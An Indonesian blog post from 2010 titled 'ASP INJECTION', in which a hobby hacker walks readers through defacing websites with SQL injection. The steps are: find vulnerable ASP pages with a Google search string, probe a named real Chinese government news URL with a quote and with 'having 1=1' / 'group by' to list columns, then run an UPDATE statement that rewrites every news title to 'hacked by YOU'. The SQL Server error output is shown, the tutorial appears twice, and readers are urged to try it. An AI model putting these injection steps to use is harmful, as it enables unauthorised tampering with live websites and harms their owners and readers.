Postingan
langsung yak .. eng ing eeenggggg....
1. cari target di google dengan keyword : default.asp?newsID=4352 ( contoh aja masih banyak kok yang lain)
2. uda dapet? contohnya : http://www.pyyr.gov.cn/new_show.asp?id=8887
3. cek bisa di injek apa gak dgn cara tambah kan tanda ‘ di akhir URL
http://www.pyyr.gov.cn/new_show.asp?id=8887′
klo errornya gini
maka lanjutkan perjuangan mu ok
4. Buat mencari bugnya gunakan having 1=1
http://www.pyyr.gov.cn/new_show.asp?id=8887 having 1=1
maka mucul pesan akan eror
5. Uda ketemu kan coloumnya? itu tuh main.id
6. trus http://www.pyyr.gov.cn/new_show.asp?id=8887 group by main.id having 1=1;–
maka muncul pesan error :
7. Uda ketemu kan titlenya ini nih main.title langsung aja update
http://www.pyyr.gov.cn/new_show.asp?id=8887 update main set title=’hacked by YOU’
diperhatiin kolomnya jangan ampe salah ya.
klo uda tinggal buka aja homenya
Jreeeng news smua berubah jadi Hacked by YOU,..terserah si mau hacked by you..mau defaced by you..mau eek kek fuck u admin mau security is null.. mau makan bakso kek apaan kek.. sok aja di coba kalo bisa :lol:
masalahnya ini bug lama :lol:
semoga beruntung aja :lol:
thanks to anak|jendral, Ronald_Pa1000, bang Jo2, bang Hmei7
sumber tecon-crew.org
1. cari target di google dengan keyword : default.asp?newsID=4352 ( contoh aja masih banyak kok yang lain)
2. uda dapet? contohnya : http://www.pyyr.gov.cn/new_show.asp?id=8887
3. cek bisa di injek apa gak dgn cara tambah kan tanda ‘ di akhir URL
http://www.pyyr.gov.cn/new_show.asp?id=8887′
klo errornya gini
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 ” 之前有未闭合的引号
/new_show.asp,行 89
maka lanjutkan perjuangan mu ok
4. Buat mencari bugnya gunakan having 1=1
http://www.pyyr.gov.cn/new_show.asp?id=8887 having 1=1
maka mucul pesan akan eror
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.id’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。
/new_show.asp,行 89
5. Uda ketemu kan coloumnya? itu tuh main.id
6. trus http://www.pyyr.gov.cn/new_show.asp?id=8887 group by main.id having 1=1;–
maka muncul pesan error :
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.title’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。
/new_show.asp,行 89
7. Uda ketemu kan titlenya ini nih main.title langsung aja update
http://www.pyyr.gov.cn/new_show.asp?id=8887 update main set title=’hacked by YOU’
diperhatiin kolomnya jangan ampe salah ya.
klo uda tinggal buka aja homenya
Jreeeng news smua berubah jadi Hacked by YOU,..terserah si mau hacked by you..mau defaced by you..mau eek kek fuck u admin mau security is null.. mau makan bakso kek apaan kek.. sok aja di coba kalo bisa :lol:
masalahnya ini bug lama :lol:
semoga beruntung aja :lol:
thanks to anak|jendral, Ronald_Pa1000, bang Jo2, bang Hmei7
sumber tecon-crew.org
Anda baru saja membaca artikel yang berkategori dengan judul ♀ ASP INJECTION ♀. Anda bisa bookmark halaman ini dengan URL http://blogku-duniaku.blogspot.com/2010/02/asp-injection.html. Terima kasih!
Ditulis oleh:
zenonk - Sabtu, 20 Februari 2010
Belum ada komentar untuk "♀ ASP INJECTION ♀"
Posting Komentar